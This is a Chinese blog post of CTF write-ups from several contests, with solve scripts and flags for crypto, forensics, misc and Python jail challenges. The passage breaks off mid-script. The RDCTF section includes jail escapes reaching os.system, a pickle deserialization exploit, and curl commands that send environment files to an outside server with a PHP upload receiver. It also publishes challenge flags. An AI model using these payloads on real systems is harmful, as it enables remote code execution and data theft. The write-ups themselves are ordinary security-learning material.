主要是打的比赛有点杂,还是全部挂上面算了
湘岚杯
别呀啦(签到)
XLCTF{xnnxixixi6-666-666-love}base64游戏
这道题真麻烦啊
挺费劲的
最开始是打算按照base64编码过程模拟,但是一个一个找真的好麻烦,后来使用了正常base64和题目base64映射,解决出来了
'''
def ascii_to_binary(input_string):
"""
将输入的字符串逐个转换为ASCII码,然后将每个ASCII码转换为8位二进制码,并以6个一组计算索引值并输出
:param input_string: 需要转换的字符串
:return: 转换后的索引值列表
"""
binary_list = []
index_list = []
# 将每个字符转换为ASCII码,然后转换为8位二进制码
for char in input_string:
ascii_code = ord(char)
binary_code = format(ascii_code, '08b')
binary_list.append(binary_code)
# 将二进制码连接起来,并以6个一组计算索引值
binary_string = ''.join(binary_list)
for i in range(0, len(binary_string), 6):
group = binary_string[i:i+6]
if len(group) < 6:
group += '0' * (6 - len(group))
index = int(group, 2)
index_list.append(index)
return index_list
# 测试脚本
if __name__ == "__main__":
input_str = "adfoijweigohfsiofjdosipajfoipewjgrhwuighehjopisjfdskl;rfop1989043573246572493700893298075946958654$@#%^&%*^&(()_+_)(_)&%&$@!$~+6+5+45+952"
index_list = ascii_to_binary(input_str)
print(f"Index list: {index_list}")
'''
#look here从这里开始
import base64
# 给定的输入数据和编码结果
input_string = "帆帆帆帆帆帆帆帆帆帆扫IP返回瑞哦额我i了safhiouewroijfdajdfsa"
encoded_string = "kCOakCOakCOakCOakCOakCOakCOakCOakCOakCOakANMlD8AykszNkgxf7gzf1CnAnLNOmGnkSvatPGNpazy02DLtNBnpN7fe2nf7xRY"
# Base64编码原理:每6位二进制数据对应Base64表中的一个字符
# 需要反向推导出Base64表
# 将输入数据转换为字节
input_data = input_string.encode('utf-8')
# 用标准Base64编码数据
encoded_data = base64.b64encode(input_data).decode('utf-8')
# 打印编码结果
print("Standard Base64: ", encoded_data)
print("Given Base64: ", encoded_string)
# 比较并推导Base64表
base64_table = [None] * 64
# 对比给定编码和标准Base64编码结果
for i in range(len(encoded_data)):
if encoded_data[i] != encoded_string[i]:
print(f" {i}: {encoded_data[i]} -> {encoded_string[i]}")
//最后还剩下几个没找到,不想浪费时间,只能暴力枚举了
from itertools import product
# 原始字符串
input_str = "oT98FGabJmHS4R+6ZKlsrD2Ve7pCt0jUwYO3fzNxAnvMi/*yEhWcudPLQk1g5BX*"
# 找到所有 * 的位置
star_indices = [i for i, char in enumerate(input_str) if char == '*']
# 替换字符的选项
replacements = ['I', 'q']
# 生成所有可能的组合
for combo in product(replacements, repeat=len(star_indices)):
# 将字符串转换为列表以便修改
str_list = list(input_str)
# 替换 * 为对应的字符
for idx, char in zip(star_indices, combo):
str_list[idx] = char
# 输出结果
print(''.join(str_list))
"""
┌──(yolo㉿Yolo)-[~]
└─$ nc xlctf.huhstsec.top 42315
Mischievous J1NXEM accidentally lost the Base64 table, leaving only a remote encryptor. Can you find a way to help him recover the password table?
Loading your session
Please input the string you want to encode:
oT98FGabJmHS4R+6ZKlsrD2Ve7pCt0jUwYO3fzNxAnvMi/qyEhWcudPLQk1g5BXI
Encode: CdZk+F7be2mHCrYsRGJMRznSCbRWK8m27s0EZLZEpzDL2r5c7xn+jFGq0fdnSLGkK2YVeLDfrFhKpcGxRrmelZ==
Please input your guessed Base64 table (64 unique characters):
oT98FGabJmHS4R+6ZKlsrD2Ve7pCt0jUwYO3fzNxAnvMi/qyEhWcudPLQk1g5BXI
yes
XLCTF{6227e724-55d6-4af4-90f9-39cc1c949091}
""" 冬季赛
简单算术
xor加暴力
key:1f
flag{x0r_Brute_is_easy!}See anything in these pics
解压后得到了一个Aztec码和加密压缩包
解码后得到key:5FIVE
得到了一张照片,用foremost扫一遍后,得到了张纯黑的png图片,用010看,发现得crc爆破,找到原来的宽高
修改后,看到了flag
flag{opium_00pium}简单镜像提取
在流量分级统计中,看到最显眼的data
看到是个post请求,发送了个压缩包,将压缩包导出来后,得到了个.img文件
用autopsy挂载后,看到了一个表格文件,文件下面有我要的flag
flag{E7A10C15E26AA5750070EF756AAA1F7C}压力大,写个脚本吧
是一道嵌套压缩包的问题,每个压缩包的密码被base64编码过,这是我的解压脚本
import zipfile
import os
import base64
# 设置初始压缩包路径和提取的文件夹路径
initial_zip = "G:/i_winter/zip/zip_98.zip" # 初始压缩包路径
extracted_folder = "G:/i_winter/zip/" # 提取的文件夹路径
# 确保提取目录存在
if not os.path.exists(extracted_folder):
os.makedirs(extracted_folder)
import base64
def decode_base64(encoded_password):
""" 解码 Base64 密码并清理无效字符 """
try:
# 解码 Base64
decoded = base64.b64decode(encoded_password).decode('utf-8', 'ignore')
print(f"解码后的密码: {decoded}")
# 清理密码中的无效字符(如换行符、空格等)
cleaned_password = decoded.replace('\n', '').replace('\r', '').strip()
print(f"清理后的密码: {cleaned_password}")
return cleaned_password
except Exception as e:
print(f"解码失败: {e}")
return None
# 测试
encoded_password = "RkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZH"
password = decode_base64(encoded_password)
if password:
# 使用解码并清理后的密码进行解压
# 在你的解压函数中将 password 作为参数传递
pass
def extract_zip(zip_path, extract_to, password=None):
""" 解压指定的 ZIP 文件,使用密码(如果有),并解压后删除压缩包 """
try:
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_ref.extractall(extract_to, pwd=password.encode() if password else None)
print(f"成功解压: {zip_path}")
# 解压后删除已解压的压缩包
os.remove(zip_path)
print(f"已删除压缩包: {zip_path}")
except Exception as e:
print(f"解压失败: {zip_path}, 错误: {e}")
def find_zip_files(directory):
""" 查找目录下的所有 ZIP 文件 """
zip_files = []
for root, _, files in os.walk(directory):
for file in files:
if file.endswith('.zip'):
zip_files.append(os.path.join(root, file))
return zip_files
def read_password_from_text(directory):
""" 读取目录中第一个文本文件的内容作为密码 """
for root, _, files in os.walk(directory):
for file in files:
if file.endswith('.txt'):
with open(os.path.join(root, file), 'r') as f:
password = f.read().strip()
print(f"读取到密码: {password}")
return decode_base64(password)
return None
def auto_extract(start_zip):
""" 自动解压,直到没有 ZIP 文件 """
current_zip = start_zip
password = None
while current_zip:
# 提取压缩包内容
extract_zip(current_zip, extracted_folder, password)
# 读取密码(从文本文件中)
password = read_password_from_text(extracted_folder)
if not password:
print("没有找到密码,解压结束。")
break
# 查找提取文件夹中是否有新的 ZIP 文件
zip_files = find_zip_files(extracted_folder)
if zip_files:
current_zip = zip_files[0] # 选择第一个找到的 ZIP 文件继续解压
print(f"找到新的压缩包: {current_zip}")
else:
print("没有更多的压缩包了,解压结束。")
break
# 开始自动解压
auto_extract(initial_zip)
import base64
# 定义输出文件
output_file = "decoded_passwords.txt"
# 打开输出文件以写入
with open(output_file, "w") as out_file:
# 遍历从 password_99.txt 到 password_0.txt 的文件
for i in range(99, -1, -1):
input_filename = f"password_{i}.txt"
try:
# 打开每个密码文件
with open(input_filename, "r") as in_file:
# 读取文件内容并去除换行
encoded_string = in_file.read().strip()
# Base64 解码
decoded_bytes = base64.b64decode(encoded_string)
decoded_string = decoded_bytes.decode('utf-8', errors='ignore') # 假设解码结果是文本
# 将解码后的内容写入输出文件
out_file.write(decoded_string + "\n")
print(f"Decoded password_{i}.txt and added to the output file.")
except Exception as e:
print(f"Error decoding {input_filename}: {e}")
print(f"All decoded passwords have been saved to {output_file}.")解压到最后有个hint:PASSWORD+PASSWORD.png
显然需要字符串转图片了,但是我最开始一直在想Base64转png了,结果没想到那些密码都是16进制,进行拼接后,得到了张png图片,里面是二维码,扫出来结果就是flag
flag{_PASSWORDs_is_fl@g!_}ez_forensics
这个取证说难也不难
先是filescan一下(直接scan,太麻烦,不好找
然后通过位移把文件dump出来,前面的那个快捷方式用处不大,直接看最后的那个
dump出来后,得到的信息是
在st4rr师傅的指导下,知道这个是rot13+rot47,通过对密文的解密后,得到了
you should try hashdump for the password of the 7z?可以判断,这个取证里我要找到7z包还得hashdump一下
dump出来后,得到的是解密的压缩包,用cmd5把哈希破解得到压缩包密码strawberrirs
再然后,我得到了个hint和一个配置文件,分析后可以判断我要通过配置文件得到ssh远程连接的明文密码,但是在配置文件中,我只能得到一个被加密的字符串,接下来需要用到这个工具
猜测master是文件名flag_is_here
base64解码后得到了flag
flag{you_are_a_g00d_guy}通往哈希的旅程
给了40位的字符串,可以判断它是sha1哈希
又给了位数和前缀188可以考虑爆破
import hashlib
# 目标哈希值
target_hash = 'ca12fd8250972ec363a16593356abb1f3cf3a16d'
# 暴力破解SHA-1哈希值,生成188开头的11位电话号码
def brute_force_sha1(target_hash):
for i in range(10000000, 100000000): # 11位数字范围
phone_number = f'188{i}' # 以188开头的电话号码
hash_object = hashlib.sha1(phone_number.encode())
phone_hash = hash_object.hexdigest() # 获取哈希值
# 比较生成的哈希值与目标哈希值
if phone_hash == target_hash:
return phone_number # 找到匹配的号码
return None # 如果没有找到匹配的号码
# 调用爆破函数
result = brute_force_sha1(target_hash)
if result:
print(f"找到匹配的号码:{result}")
else:
print("未找到匹配的号码")
#找到匹配的号码:18876011645
#flag{18876011645}你是小哈斯?
这题蛮难受的,可以说是一道映射题,把每个字符的sha1值弄出来,一个一个比对,找到了flag,通过比对出来的结果是:
1234567890-=qwertyuiopflag{no_is_flag}asdfghjklzxcvbnm,flag{game_cqb_isis_cxyz}.asdfghjklzxcvbnm,.qwertyuiopflag{no_is_flag}1234567890-=所以flag是
flag{game_cqb_isis_cxyz}可惜没按时交上去
easy_flask
第一次用到一把梭神器fenjing,真强
flag{48ad0cde8345c8b2608933ac4e85147e}RDCTF
Eye's_Secret
拿到手的是一个伪装成gif的png图片
分析发现里面有好多png图片拼接,所以用foremost分离
一共92张奶龙png照片
根据师傅给的hint,接下来应该用oursecret尝试提取,虽然不清楚密码是什么,但是我可以先尝试找到哪张照片中有隐藏信息
真的把所有的图片都尝试过了(师傅别笑话哈
但是都显示没有隐藏信息,然后就没思路了
第70个有东西,接下来找密码
在出题师傅的指导下,我要在同样闭着眼睛的奶龙照片中查找,通过查看LSB,得到了压缩包密码lose_eyes
解压后得到了flag文本,base92解码后得到最终flag
flag{W0w11!_u_f1n9_Th3_Na1L0n9's_Secr3t??!!!!}Jail_Level_2!!
和0x_week4的jail题相比还更简单呢
用Unicode切到后台,然后就开始找flag,然后就完了
flag{70ce4980-1a5f-4646-a5a6-56426dbf2f4d}
JAil_level3
┌──(yolo㉿Yolo)-[~]
└─$ nc ctf.wdsec.com.cn 33357
____ ____ ____ _____ _____ _ _ _ _ ___ _ _____
| _ \| _ \ / ___|_ _| ___| _| || |_ | | / \ |_ _| | |___ /
| |_) | | | | | | | | |_ |_ .. _| _ | |/ _ \ | || | |_ \
| _ <| |_| | |___ | | | _| |_ _| | |_| / ___ \ | || |___ ___) |
|_| \_\____/ \____| |_| |_| |_||_| \___/_/ \_\___|_____| |____/
Welcome to RDCTF # jail!
Level 3 ! Think_Different
> 𝓮val(inp𝓾t(''))
__import__('os').system('ls')
main.py
Answer: 0
┌──(yolo㉿Yolo)-[~]
└─$ nc ctf.wdsec.com.cn 33357
____ ____ ____ _____ _____ _ _ _ _ ___ _ _____
| _ \| _ \ / ___|_ _| ___| _| || |_ | | / \ |_ _| | |___ /
| |_) | | | | | | | | |_ |_ .. _| _ | |/ _ \ | || | |_ \
| _ <| |_| | |___ | | | _| |_ _| | |_| / ___ \ | || |___ ___) |
|_| \_\____/ \____| |_| |_| |_||_| \___/_/ \_\___|_____| |____/
Welcome to RDCTF # jail!
Level 3 ! Think_Different
> 𝓮val(inp𝓾t(''))
__import__('os').system('env >o.txt')
Answer: 0
┌──(yolo㉿Yolo)-[~]
└─$ nc ctf.wdsec.com.cn 33357
____ ____ ____ _____ _____ _ _ _ _ ___ _ _____
| _ \| _ \ / ___|_ _| ___| _| || |_ | | / \ |_ _| | |___ /
| |_) | | | | | | | | |_ |_ .. _| _ | |/ _ \ | || | |_ \
| _ <| |_| | |___ | | | _| |_ _| | |_| / ___ \ | || |___ ___) |
|_| \_\____/ \____| |_| |_| |_||_| \___/_/ \_\___|_____| |____/
Welcome to RDCTF # jail!
Level 3 ! Think_Different
> 𝓮val(inp𝓾t(''))
__import__('os').system('ls')
main.py
o.txt
Answer: 0
┌──(yolo㉿Yolo)-[~]
└─$ nc ctf.wdsec.com.cn 33357
____ ____ ____ _____ _____ _ _ _ _ ___ _ _____
| _ \| _ \ / ___|_ _| ___| _| || |_ | | / \ |_ _| | |___ /
| |_) | | | | | | | | |_ |_ .. _| _ | |/ _ \ | || | |_ \
| _ <| |_| | |___ | | | _| |_ _| | |_| / ___ \ | || |___ ___) |
|_| \_\____/ \____| |_| |_| |_||_| \___/_/ \_\___|_____| |____/
Welcome to RDCTF # jail!
Level 3 ! Think_Different
> 𝓮val(inp𝓾t(''))
__import__('os').system('cat o.txt')
HOSTNAME=e1d62fe61a03
SOCAT_PEERADDR=42.63.232.53
HOME=/root
SOCAT_PEERPORT=14398
SOCAT_SOCKADDR=172.17.0.3
LC_CTYPE=C.UTF-8
SOCAT_VERSION=1.7.4.4
SOCAT_SOCKPORT=9999
OS_ARCH=amd64
BITNAMI_APP_NAME=python
OS_NAME=linux
PATH=/opt/bitnami/python/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
GZCTF_FLAG=flag{db2b768f-9d0c-4aa4-ab4d-b16ef7a80e25}
SOCAT_PID=53
PWD=/app
SOCAT_PPID=1
OS_FLAVOUR=debian-12
GZCTF_TEAM_ID=86
APP_VERSION=3.13.1
Answer: 0用Unicode绕过黑名单,然后进行常规操作就行了
Naiiiiiiiii
这道流量分析题难度不大
先看流量包里面最大的两个http流,分别从中把zip包和pngdump下来
题目还挺不错的,考到了数据结构
其中png图片上的字符串就是压缩包的密码
I Believe I Can Fly解压后就能得到flag了
flag{Do_u_L1k3_th4_F1y1ng_N@1L0n9???!!!}Opcode_test
这个反序列还挺有意思
在chatgpt的帮助下,我知道了,这东西不能在终端上直接输入,而是通过py脚本终端发送信息
import socket
import pickle
# 构造恶意 payload
class Exploit:
def __reduce__(self):
import os
return (os.system, ("curl -F file=@out.txt https://...../..",)) # 替换为任意命令
payload = pickle.dumps(Exploit())
# 连接到服务器并发送数据
host = "ctf.wdsec.com.cn"
port = 33342
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
print(s.recv(1024).decode()) # 接收欢迎信息
s.sendall(payload) # 发送 pickle 数据
print(s.recv(1024).decode()) # 接收返回结果
我先是用env查看了环境信息,然后上传到我的服务器中去,最后得到flag
flag{0c817de3-df04-4dd5-b399-04a619f79f1b}Signin_Jail
这道题蛮不错的,又解锁了jail的新姿势,还学了rce的简单策略
审计代码后,a,g,N,L,O,!被ban了,而且呢,这东西还不回显,通过上网研究以及询问gpt,我计划通过curl发送post请求,将我要的文件dump出来
首先在服务器上部署个upload.php
<?php
// 设置允许上传的文件类型
$allowed_types = ['text/plain', 'application/x-python', 'application/octet-stream']; // 可根据需要修改
// 处理上传的文件
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
// 检查文件是否存在
if (isset($_FILES['file']) && $_FILES['file']['error'] == 0) {
$file = $_FILES['file'];
$file_name = basename($file['name']);
$file_size = $file['size'];
$file_type = $file['type'];
// 验证文件类型
if (!in_array($file_type, $allowed_types)) {
echo "不允许的文件类型!";
exit;
}
// 设置文件保存路径
$upload_dir = '/www/wwwroot/****.top/uploads/'; // 修改为实际保存路径
$upload_file = $upload_dir . $file_name;
// 检查文件是否存在
if (file_exists($upload_file)) {
echo "文件已存在!";
} else {
// 移动文件到目标位置
if (move_uploaded_file($file['tmp_name'], $upload_file)) {
echo "文件上传成功!保存路径: " . $upload_file;
} else {
echo "文件上传失败!";
}
}
} else {
echo "没有文件上传!";
}
} else {
echo "请使用POST方法上传文件!";
}
?>
接下来在终端构造payload
┌──(yolo㉿Yolo)-[~]
└─$ nc ctf.wdsec.com.cn 34353
____ ____ ____ _____ _____ _ _ _ _ ___ _ _
| _ \| _ \ / ___|_ _| ___| _| || |_ | | / \ |_ _| | / |
| |_) | | | | | | | | |_ |_ .. _| _ | |/ _ \ | || | | |
| _ <| |_| | |___ | | | _| |_ _| | |_| / ___ \ | || |___ | |
|_| \_\____/ \____| |_| |_| |_||_| \___/_/ \_\___|_____| |_|
Welcome To The RDCTF !!!
> __import__('subprocess').run(['env >env.txt'],shell=True)
Answer: CompletedProcess(args=['env >env.txt'], returncode=0)
┌──(yolo㉿Yolo)-[~]
└─$ nc ctf.wdsec.com.cn 34353
____ ____ ____ _____ _____ _ _ _ _ ___ _ _
| _ \| _ \ / ___|_ _| ___| _| || |_ | | / \ |_ _| | / |
| |_) | | | | | | | | |_ |_ .. _| _ | |/ _ \ | || | | |
| _ <| |_| | |___ | | | _| |_ _| | |_| / ___ \ | || |___ | |
|_| \_\____/ \____| |_| |_| |_||_| \___/_/ \_\___|_____| |_|
Welcome To The RDCTF !!!
> __import__('subprocess').run(['curl','-F','file=@env.txt','https://****.top/up.php'])
Answer: CompletedProcess(args=['curl', '-F', 'file=@env.txt', 'https://****.top/up.php'], returncode=0)在终端保存的文件夹中查看后,得到了flag
flag{f725c2e3-b86f-495c-9c6a-a9c8daa50b0d}b4by_Qu3st10nna1r3_5urv3y
flag忘记粘了就不挂了,总结一下,这场RDctf不管是出题师傅还是题的质量,都感觉挺不错的,确实学到了许多,谢谢各位师傅
ez_math
这是一道弹计算机的题,当初在0x的时候见过,两者其实差的不是太大
这是我的代码,这次硬头皮手改的屎山代码,别笑我哈
from pwn import *
import re
import time
r=remote('ctf.wdsec.com.cn',32862)
def dele0(num):
num_str = str(num)
if '.' in num_str:
# 拆分小数部分
integer_part, decimal_part = num_str.split('.')
# 如果小数部分最后一位是0,去掉它
if decimal_part[-1] == '0':
decimal_part = decimal_part.rstrip('0') # 去掉末尾的0
# 如果小数部分为空(意味着是整数),返回整数部分
if decimal_part:
return f"{integer_part}.{decimal_part}"
else:
return integer_part # 如果没有小数部分了,返回整数部分
else:
return num_str # 如果没有小数部分,直接返回
def format_number(num):
num_str = str(num)
if '.' in num_str:
decimal_part = num_str.split('.')[1]
if len(decimal_part) >= 3:
num = round(num, 2)
num="{:.2f}".format(num)
return dele0(num)
else:
return num_str
else:
return num_str
# 获取题目的提示,并过滤掉多余的字符
output = r.recvuntil(b'>').decode()
print("[INFO] Full output received before formula: ")
print(output) # 打印接收到的所有内容
match = re.search(r'formula is (.+?)\.', output)
if match:
expression = match.group(1).strip()
print(f"[INFO] Received expression: {expression}")
result=eval(expression)
print("the result:",result)
result=format_number(result)
print(result)
r.sendline(str(result).encode())
print("have sent")
response=r.recvuntil(b'>>').decode()
print("the response:",response)
count=1
for i in range(98):
new_match=re.search(r'formula is (.+?)\.',response)
if new_match:
new_expression=new_match.group(1).strip()
print("new expression:",new_expression)
new_result=eval(new_expression)
print(new_result)
new_result=format_number(new_result)
print(new_result)
r.sendline(str(new_result).encode())
print("have seet")
response=r.recvuntil(b'>>').decode()
print("the response:",response)
count=count+1
print(count)
match=re.search(r'formula is (.+?)\.',response)
expression = match.group(1).strip()
print(f"[INFO] Received expression: {expression}")
result=eval(expression)
print("the result:",result)
result=format_number(result)
print(result)
r.sendline(str(result).encode())
print("have sent")
print(count)
print(response)
r.interactive() 这代码写的我真费劲,我也是明白现在比较严重的短板是编程能力有点差劲,接下来得控制下对gpt的依赖了,这是出题师傅给出的payload,他好强,十几行代码吊打我/(ㄒoㄒ)/~~
from pwn import *
import re
p=remote("ctf.wdsec.com.cn",32862)
while True:
try:
recv=p.recvuntil(">> ").decode()
print(recv)
formula=re.findall(r"formula is ([^.]+)\.",recv)[0]
result=eval(formula)
p.sendline(str(round(result,2)).encode())
except:
p.interactive()
奶龙的大秘密
这题挺不错的,考的内容是之前0x难住我的
先看excel,用bindzip将sheet1提取出来,用记事本将最下面的sha512部分直接删掉,再重新打包回去,打开后会发现password3:_$real
然后在docx文件里通过查找,得到了password1:#This_
#This_@is_!the_$real_%key其中第二段在照片下面,第四段在excle的压缩包的最后一个bin文件中,开始解压文件,得到flag
flag{You_find_a_real_NL}流星雨
先是用deepsound将hint.txt提取出来,然后用http://330k.github.io/misc_tools/unicode_steganography.html将密码提取出来:w0_4_nAiL0ng_w0_cAi_4_Na1_l0n9
然后是拨号音频
按照这个表一步一步找就出来了
47595014146100044828307105762515一个hyra废了我一下午的时间,总是搞出来了
平等文明自由自由自由和谐平等自由自由公正法治友善平等和谐自由和谐爱国公正自由公正文明公正民主公正和谐公正文明和谐自由文明友善法治和谐民主和谐公正和谐公正公正民主文明友善法治和谐自由和谐平等公正民主和谐公正文明诚信和谐公正民主和谐民主和谐和谐公正民主文明诚信和谐和谐自由公正民主和谐文明和谐公正和谐公正公正和谐和谐民主和谐爱国和谐公正和谐敬业和谐民主和谐富强法治诚信和谐RDCTF{48dbacb4-166a-45a6-a13a-4a266c186910}奶龙的超级大秘密
先用binwalk分离出来1.txt
得到许多的1,0
然后写脚本组合成一个二维码
import numpy as np
from PIL import Image
from pyzbar.pyzbar import decode
# 读取数字矩阵,假设文件名为 'binary_matrix.txt'
def read_matrix(file_path):
with open(file_path, 'r') as f:
# 读取一行文本并移除换行符
data = f.read().strip()
# 将字符串按每100个字符划分,转换成100x100的矩阵
return np.array([list(map(int, list(data[i:i+100]))) for i in range(0, len(data), 100)])
# 将矩阵保存为二维码图像
def save_qr_image(matrix, output_path='qr_code.png'):
# 创建一个空白的白色图像
img = Image.new('1', (100, 100), 1) # '1' 是模式,表示黑白图像
pixels = img.load()
for i in range(100):
for j in range(100):
# 根据0和1的值设置图像的像素
pixels[j, i] = 0 if matrix[i, j] == 1 else 1
# 保存图像
img.save(output_path)
img.show()
# 解码二维码图像
def decode_qr_image(image_path='qr_code.png'):
img = Image.open(image_path)
decoded_objects = decode(img)
for obj in decoded_objects:
print(f"Decoded Data: {obj.data.decode('utf-8')}")
# 主程序
if __name__ == '__main__':
# 读取10000个数字并构建矩阵
matrix = read_matrix('1.txt')
# 保存图像
save_qr_image(matrix, 'qr_code.png')
# 解码二维码
decode_qr_image('qr_code.png')
得到密码
password:Hello_RDCTF然后在pptx中得到了好多张纯色图片,通过分析,是七原色
写脚本
def decode_seven_base_grouped(encoded_data):
# 确保输入是一个字符串
if not isinstance(encoded_data, str):
raise ValueError("输入数据必须是字符串形式的七进制数")
# 移除可能的空格
encoded_data = encoded_data.replace(" ", "")
# 检查每个字符是否为七进制数字
if not all(char in '0123456' for char in encoded_data):
raise ValueError("输入数据中包含非七进制数字")
# 结果存储变量
decoded_text = ""
# 每三个一组进行处理
for i in range(0, len(encoded_data), 3):
# 获取三位七进制数
group = encoded_data[i:i+3]
# 如果当前组不足3位,则跳过
if len(group) != 3:
continue
# 将七进制数转换为十进制
decimal_value = int(group, 7)
# 将十进制值转换为字符
decoded_text += chr(decimal_value)
return decoded_text
# 示例用法
encoded_data = '204213166205234215166210164213216215205164232232202223236' # 七进制编码的数据
decoded_text = decode_seven_base_grouped(encoded_data)
print("解码结果:", decoded_text)
#flag{nai_long_yyds}EZ_RSA1
第一次学会用工具一把梭
import gmpy2
from Crypto.Util.number import long_to_bytes
e=65537
n=10784287819385415353621875218563143302159768325704928073867416808040916996479341048063223714643174249461097295535297542385475849470046760369978768211220988313304188367229395180043407712292398872921220233051142848776456790641708863113887722318345601554351621305567539237641096651148337525250970956775311944016141879494664318933091284315673333318969018209756116226492696486038744619977928991239409925382390262035475423869395568601956013364403631988387757474363593218046567386448482628006367012358287524440361632608335934523058793771435203563217660703267386600175482629638068995270497505139491768944189370651947532096313
c = 8010415678766495559206888104308220461000137190504006792719473726344733619441141193462632115436953071133591418480457170724671799432518092660776309476406070558451285172355261125033267340649376421801091685798286314106142855053515428470474693625489377898001862186681685082360598622408094264333299738655461877207390809495955984957338296805424644630493393029139944919536399174215810604102444550172759845344395864486440754752041405094877450680140850037755156965823345868285966939695682195399775462308951218301326547363911121730948439732333381005743591960455287452246675824174748812338877227345103716723376979538380032002880
p = 106348657843456247937199414850650064852966584880445276216913236723846533406701137197484869024349002045099867974183381640755625805579240990088835293080057081264250495105890689421045003030478714263550171751636828681281125518737348260656418581851287088807056711844004861660376680994208923924816273559983888965649
q=n//p
phi_n=(p-1)*(q-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)
print(long_to_bytes(m))
#flag{8d3fcc6d-1ea4-4b31-90ae-fc911a127059}RSA2
维纳维纳
先算私钥
在网上找到的大佬的脚本https://github.com/maximmasiutin/rsa-boneh-durfee
算出来私钥
[yolo@Yolo desktop]$ sage rsa2.sage
=== checking values ===
* delta: 0.260000000000000
* delta < 0.292 True
* size of e: 2046
* size of N: 2046
* m: 4 , t: 1
=== running algorithm ===
* removing unhelpful vectors 4 and 5
* removing unhelpful vector 3
* removing unhelpful vectors 1 and 2
* removing unhelpful vector 0
5 / 10 vectors are not helpful
det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)
00 X 0 0 0 0 0 0 0 0 0 ~
01 X X 0 0 0 0 0 0 0 0 ~
02 X X X 0 0 0 0 0 0 0
03 X X X X 0 0 0 0 0 0
04 0 0 0 0 X 0 0 0 0 0 ~
05 0 0 0 0 X X 0 0 0 0 ~
06 0 0 0 0 X X X 0 0 0 ~
07 0 0 0 0 X X X X 0 0
08 0 0 0 0 X X X X X 0
09 X X X X 0 X X X X X
optimizing basis of the lattice via LLL, this can take a long time
LLL is done!
looking for independent vectors in the lattice
found them, using vectors 0 and 1
=== solution found ===
private key found: 2873372627123285391417965171775745374675133061136382399922870682018171188972257743150566638645430634900490623442750072842152753183004232565321312822054344464671然后我们要的东西都有了接下来求m就ok了
from Crypto.Util.number import *
c = 7604590913397004198963689400358802120334625316301111112576886513655107430495751968941301515797861955002951207375478521459811264470942298766088374550675466903738516416244757442099063102988037782219973697304563362512368154513305930639693679988291071020713046533919668788348441464101295258155091624702431371922987498153144768352796512144661515761036886506951085217618722096752361644269310855940222737123637473411009002629293214503812144543988961901514327199004251951383064874573493721463001553726609537700853804264152779596347547365622363127042216195888205262834357028553426852001895634392853557568345813531537434672292
n=16145163005933810407752261390690458192000069934308800024793251111968297506978117680236631519134867456575599695051667859912486947325264983719050757010183264697879891337878352798559722307748191755884685168019750761992350866988144145508350759530849991025771815475490203524655715315406455490957031437606278684238684357961687750515481282458824342733221757328761803977347968239166300156697100824105916874354045078956289531442842186668325781737778325666035240164210867972975845514644865573894980966648127102115771282611672127276763261636922198587850125676847952570005820048642886137010843289815486863693662806191261840920411
d=2873372627123285391417965171775745374675133061136382399922870682018171188972257743150566638645430634900490623442750072842152753183004232565321312822054344464671
m = pow(c, d, n)
print(long_to_bytes(m))
#b'flag{effca6f2-1bb5-44f7-9403-1f907f66a83e}'RSA3
from Crypto.Util.number import *
n = 15053972587712326737984981095267960792339756622065073579111188525445868510590330659604223270721184072331493839265159470170355392171799351983071497034810534019098703586813178437220000299237564282685942973829256106470995577875224440900106659050273746948304690979611555091116990178959102554357379384064023182080666700106786150886642818482223897622665849350111428407215080384898306325112756469433773725135674797895617970989257055210731649722015842513058362567716844365541283978060810817157268638267744593919341826683904937473139716860255365258773315735723264469047254466729380062497129772537539992820940452374819883889699
p = 111461468683434975170530082386729308107721083330906321058829121868326203430516773024485160400892174495966198556599452146295591878375056413679531156926335281885967735274037488966954241985730655093765767422341322517922766939016379989407145412091848456414574239068924973099845847680344754993017711649519082586907
q = 135059880024258078020929974489544029792994133864551720912636124561116374784209453412300842283879224283596533450952894183516931875969274005736947998604565020290825188410459845975970263881482961767263235648934211129811591747510154846615233845871887644159755687581177174650685690858554979076239705934188310748057
e = 20082298101283703288320865436585567770885249
c = 14327804862664623364063959258427178907935384957710441654762368424900120280331345933628360240942622378528249399860274042388166444652264747772626182323631853384104248637306969357143688880736707775656162677920244822555418781064546615832984761008516662819058902729743553993810384792884287893556573015762231261295116313261495782463177386276342992071459495908705548654524926818736963302956262559366847765617107171213693590110396340998799738668493863993908256526309854145408616790448211605902340292953799051938220864866878238498670416409507471485181473643985920194302180643875443988264359015252402590566318567500376646205537
d = inverse(e, p - 1)
m = pow(c, d, p)
print(long_to_bytes(m))
#b'flag{1d1f9bb2-e613-437a-849c-ec0db8ae7e42}'Hello_Crypto
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from binascii import unhexlify
import base64
# 密钥和IV,都是16字节(128位)
key = unhexlify('1234567890abcdef1234567890abcdef')
iv = unhexlify('1234567890abcdef1234567890abcdef')
# 密文,去掉空格后解码为十六进制字节
ciphertext = unhexlify('26a8191576aa59308f9ff3469bebbd0c8d27820531130dfe1a860e1e7b02bd7495f56b3d3d5e9a12c01c4f853693e16c')
# 创建AES解密器
cipher = AES.new(key, AES.MODE_CBC, iv)
# 解密并去除填充
decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)
# 打印解密结果
print(decrypted.decode('utf-8'))
m=base64.b64decode(decrypted)
print(m.decode('utf-8'))
'''
ZmxhZ3tXM2xjMG0zX1QwX1RIM19DcnlwVDBfVzBybGR9
flag{W3lc0m3_T0_TH3_CrypT0_W0rld}
'''LOGIN
简单的加密算法,直接搓吧
from Crypto.Util.number import bytes_to_long
alpha1 = 'abcdefghijklmnopqrstuvwxyz'
alpha2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# 已知密文和密钥
ciphertext = 'byqo{A31k0kl_m0_YODPS}'
key = 'woshinailong'
# 生成 key_nums
key_nums = []
for i in key:
if i in alpha1:
key_nums.append(alpha1.find(i))
elif i in alpha2:
key_nums.append(alpha2.find(i))
# 爆破函数
def decrypt(ciphertext, key_nums):
pointer = 0
ans = ''
for i in ciphertext:
if i in alpha1:
# 爆破 alpha1 范围内的字符
for possible_char in alpha1:
